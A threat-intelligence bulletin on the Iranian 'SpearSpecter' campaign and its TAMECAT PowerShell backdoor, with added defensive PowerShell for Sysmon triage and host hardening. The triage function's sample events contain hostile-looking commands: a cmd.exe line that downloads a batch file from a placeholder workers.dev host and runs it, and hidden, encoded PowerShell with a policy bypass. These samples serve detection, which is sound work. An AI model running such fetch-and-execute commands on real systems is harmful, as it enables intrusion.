Current Cyber Threats

Iranian Hackers Launch 'SpearSpecter' Spy Operation on Defense & Government Targets

Summary:
SpearSpecter is an ongoing, highly targeted espionage campaign attributed with high confidence to Iranian state-aligned operators working on behalf of the IRGC Intelligence Organization, with overlaps to the cluster tracked as APT42, Mint Sandstorm, Educated Manticore and CharmingCypress. The operation focuses on senior defense and government officials and, in some cases, their families. It uses long-running, personalized social-engineering lures such as conference invitations and meeting requests, increasingly moving the conversation onto WhatsApp to build trust. Once a relationship is established, victims are steered to malicious "meeting documents" hosted on legitimate services. These abuse the Windows search-ms: protocol to open an attacker-controlled WebDAV share and present a weaponized LNK file. That shortcut pulls down and executes a batch-based loader from Cloudflare Workers, which deploys TAMECAT, a modular, fileless PowerShell backdoor. TAMECAT maintains persistence, rotates through multiple C2 paths, and is heavily obfuscated and encrypted. Its modules systematically harvest high-value content (documents, browser data and cookies, Chrome and Edge credentials, Outlook OST mailboxes, and screenshots) and chunk and exfiltrate it over HTTPS and FTP using helper components such as Runs.dll. The campaign leans heavily on cloud and shared hosting and on Windows LOLBins to blend into normal traffic and leave few forensic traces.
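As an added illustration (not code from the article or from the researchers who reported SpearSpecter), the following PowerShell function triages Sysmon process-creation records for the stages of the delivery chain described above. Field names follow Sysmon Event ID 1; the sample events are constructed, the hostnames and URLs are placeholders, and the assumption that the batch loader was fetched from a workers.dev hostname is mine, not the report's.

```powershell
# Added example, not from the original report: behavioural triage of Sysmon
# Event ID 1 (process creation) records against the SpearSpecter delivery
# chain (search-ms: lure -> WebDAV share -> LNK -> batch loader -> TAMECAT).
# Works on any objects exposing UtcTime, Image, ParentImage and CommandLine,
# e.g. parsed Sysmon XML or an EDR export.
function Find-SpearSpecterActivity {
    param(
        [Parameter(Mandatory)]
        [System.Collections.IEnumerable] $Events
    )
    foreach ($e in $Events) {
        $cmd    = [string]$e.CommandLine
        $img    = [string]$e.Image
        $parent = [string]$e.ParentImage
        $hits   = [System.Collections.Generic.List[string]]::new()

        # Stage 1: a search-ms: URI whose crumb points at a remote location
        # (UNC / WebDAV), raw or URL-encoded. Legitimate search-ms links
        # normally point at local folders or libraries.
        if ($cmd -match '(?i)search-ms:' -and
            $cmd -match '(?i)crumb=location:(\\\\|%5c%5c)') {
            $hits.Add('search-ms URI with a remote crumb location')
        }
        # Stage 2a: the WebDAV Mini-Redirector setting a cookie is the usual
        # trace of the client mounting the attacker's share.
        if ($cmd -match '(?i)davclnt\.dll,DavSetCookie') {
            $hits.Add('WebDAV client session (DavSetCookie)')
        }
        # Stage 2b: Explorer launching a script host straight from a WebDAV
        # path is what a double-clicked LNK on the share looks like.
        if ($parent -match '(?i)\\explorer\.exe$' -and
            $img -match '(?i)\\(cmd|powershell|pwsh|mshta|wscript|cscript)\.exe$' -and
            $cmd -match '(?i)\\\\[\w.-]+(@SSL)?(@\d+)?\\DavWWWRoot\\') {
            $hits.Add('script host started by Explorer from a WebDAV share')
        }
        # Stage 3: cmd.exe pulling the batch loader from Cloudflare Workers.
        # ASSUMPTION: a workers.dev hostname; a custom domain would not match.
        if ($img -match '(?i)\\cmd\.exe$' -and
            $cmd -match '(?i)https?://[^\s"'']+\.workers\.dev') {
            $hits.Add('cmd.exe referencing a Cloudflare Workers URL')
        }
        # Stage 4: PowerShell launched the way a fileless loader launches it.
        if ($img -match '(?i)\\(powershell|pwsh)\.exe$' -and
            $cmd -match '(?i)(-enc(odedcommand)?\s|-w(indowstyle)?\s+hidden|iex\b|invoke-expression|downloadstring)') {
            $hits.Add('hidden/encoded/in-memory PowerShell invocation')
        }

        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                UtcTime     = $e.UtcTime
                Image       = $img
                ParentImage = $parent
                Matches     = ($hits -join '; ')
                CommandLine = $cmd
            }
        }
    }
}

# Constructed sample telemetry (placeholder hosts, no real IOCs).
$SampleEvents = @(
    [pscustomobject]@{
        UtcTime = '2025-11-17 09:12:01'; ParentImage = 'C:\Program Files\Google\Chrome\Application\chrome.exe'
        Image = 'C:\Windows\explorer.exe'
        CommandLine = '"C:\Windows\explorer.exe" "search-ms:query=Agenda&crumb=location:\\files.invalid\docs&displayname=Meeting Documents"'
    }
    [pscustomobject]@{
        UtcTime = '2025-11-17 09:12:04'; ParentImage = 'C:\Windows\System32\svchost.exe'
        Image = 'C:\Windows\System32\rundll32.exe'
        CommandLine = 'rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie files.invalid http://files.invalid/docs'
    }
    [pscustomobject]@{
        UtcTime = '2025-11-17 09:12:30'; ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Windows\System32\cmd.exe'
        CommandLine = '"C:\Windows\System32\cmd.exe" /c curl -s https://placeholder.workers.dev/run -o "%TEMP%\run.bat" && "%TEMP%\run.bat"'
    }
    [pscustomobject]@{
        UtcTime = '2025-11-17 09:12:45'; ParentImage = 'C:\Windows\System32\cmd.exe'
        Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA'
    }
    [pscustomobject]@{
        UtcTime = '2025-11-17 09:13:00'; ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Windows\System32\notepad.exe'
        CommandLine = '"C:\Windows\System32\notepad.exe" C:\Users\jdoe\Documents\notes.txt'
    }
)

Find-SpearSpecterActivity -Events $SampleEvents | Format-Table UtcTime, Image, Matches -AutoSize
```

Against the constructed sample, the first four events are flagged (one stage each) and the Notepad launch is not. Each stage is weak on its own; the value is in correlating them on one host within a short window, which is why the function emits timestamps and parent images rather than a single verdict.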


Security Officer Comments:
SpearSpecter illustrates the maturation of APT42-style tradecraft: slow-burn, relationship-driven social engineering coupled with technically sophisticated, cloud-heavy, fileless post-compromise activity. The use of WhatsApp, OneDrive, Cloudflare Workers, Telegram, and Discord within a single kill chain shows how readily state actors can hide inside the same collaboration and messaging ecosystems their victims rely on daily. TAMECAT's design (modular PowerShell, in-memory execution, AES-encrypted tasking, chunked uploads via Runs.dll, and browser data theft through Edge remote debugging and Chrome process suspension) signals a clear shift toward stealthy, intelligence-first access rather than smash-and-grab operations.


Suggested Corrections:
  • Strengthen host visibility to counter SpearSpecter's fileless techniques: enable PowerShell Script Block Logging, deploy Sysmon with SIEM ingestion, and ensure an EDR is actively monitoring in-memory execution. Build behavior-based detections from this campaign's TTPs (search-ms: URIs pointing at remote locations, WebDAV client activity, LNK-launched batch loaders, hidden or encoded PowerShell) and run retro-hunts with the IOCs published in the linked report, especially in organizations likely to interest IRGC-aligned actors.
  • Because APT42 relies heavily on executive-focused social engineering, provide targeted awareness training for senior staff. Emphasize that convincing outreach, even via WhatsApp or in the name of a legitimate organization, should be independently verified through known internal contacts before any link or document is opened.
  • Disable the abused search-ms protocol handler by exporting and then deleting the HKEY_CLASSES_ROOT\search-ms registry key, which blocks a key delivery vector; pilot the change first, since legitimate Windows Search links also use it. On the network side, baseline normal access to cloud services (Cloudflare Workers, Firebase, Discord, Telegram) and alert on deviations. Use an inspecting proxy to identify suspicious patterns, and block Telegram and Discord if they are not used for business.
  • Harden endpoints by enforcing PowerShell Constrained Language Mode (applied automatically when an AppLocker script policy or WDAC policy is in enforce mode), enabling AMSI, and keeping Script Block Logging on. Apply application control (EPM, AppLocker, WDAC) to prevent unauthorized binaries, scripts, and LNK files from executing, reducing the actor's ability to persist or move stealthily.
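The following PowerShell, added here as an example rather than taken from the article, applies two of the host-side corrections above: it removes the search-ms protocol handler after exporting it for rollback, and it turns on Script Block and Module logging through the same policy keys the Group Policy templates set. It assumes an elevated session, a backup path under ProgramData, and that no line-of-business application depends on search-ms:.

```powershell
# Added example, not from the original report. Run from an elevated session.
# Assumes: backup path under %ProgramData%; search-ms: is not needed by any
# line-of-business application (pilot on a test group first).
$Backup = Join-Path $env:ProgramData 'search-ms-handler.reg'

function Disable-SearchMsProtocol {
    param([string] $BackupPath = $Backup)
    $key = 'Registry::HKEY_CLASSES_ROOT\search-ms'
    if (-not (Test-Path $key)) { return $true }   # already removed
    # Keep an export so the change is reversible with: reg import <BackupPath>
    & reg.exe export 'HKEY_CLASSES_ROOT\search-ms' $BackupPath /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg export failed (exit $LASTEXITCODE); key left in place" }
    Remove-Item -Path $key -Recurse -Force
    return -not (Test-Path $key)
}

function Enable-PowerShellLogging {
    # Policy values honoured by Windows PowerShell 5.1 and PowerShell 7;
    # identical to the GPO under Administrative Templates > Windows Components
    # > Windows PowerShell. Events land in Microsoft-Windows-PowerShell/Operational
    # (4104 for script blocks, 4103 for module/pipeline logging).
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $sbl  = Join-Path $base 'ScriptBlockLogging'
    $mod  = Join-Path $base 'ModuleLogging'
    $mods = Join-Path $mod  'ModuleNames'
    foreach ($p in $sbl, $mod, $mods) { New-Item -Path $p -Force | Out-Null }
    New-ItemProperty -Path $sbl  -Name EnableScriptBlockLogging -Value 1   -PropertyType DWord  -Force | Out-Null
    New-ItemProperty -Path $mod  -Name EnableModuleLogging      -Value 1   -PropertyType DWord  -Force | Out-Null
    New-ItemProperty -Path $mods -Name '*'                      -Value '*' -PropertyType String -Force | Out-Null
}

function Get-HardeningState {
    # Constrained Language Mode is deliberately not set here: it is applied
    # automatically once an AppLocker script rule or WDAC policy is in enforce
    # mode, which is the supported way to enforce it. This just reports it.
    $sbl = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -ErrorAction SilentlyContinue
    $mod = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        SearchMsHandlerPresent = Test-Path 'Registry::HKEY_CLASSES_ROOT\search-ms'
        ScriptBlockLogging     = ($sbl.EnableScriptBlockLogging -eq 1)
        ModuleLogging          = ($mod.EnableModuleLogging -eq 1)
        LanguageMode           = $ExecutionContext.SessionState.LanguageMode.ToString()
    }
}

Disable-SearchMsProtocol | Out-Null
Enable-PowerShellLogging
Get-HardeningState
```

After the run, Get-HardeningState should report SearchMsHandlerPresent as False and both logging values as True; LanguageMode will still read FullLanguage until an AppLocker or WDAC policy is enforced, which is the signal that the Constrained Language Mode recommendation above has not yet taken effect.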
Link(s):
https://thehackernews.com/2025/11/iranian-hackers-launch-spearspecter-spy.html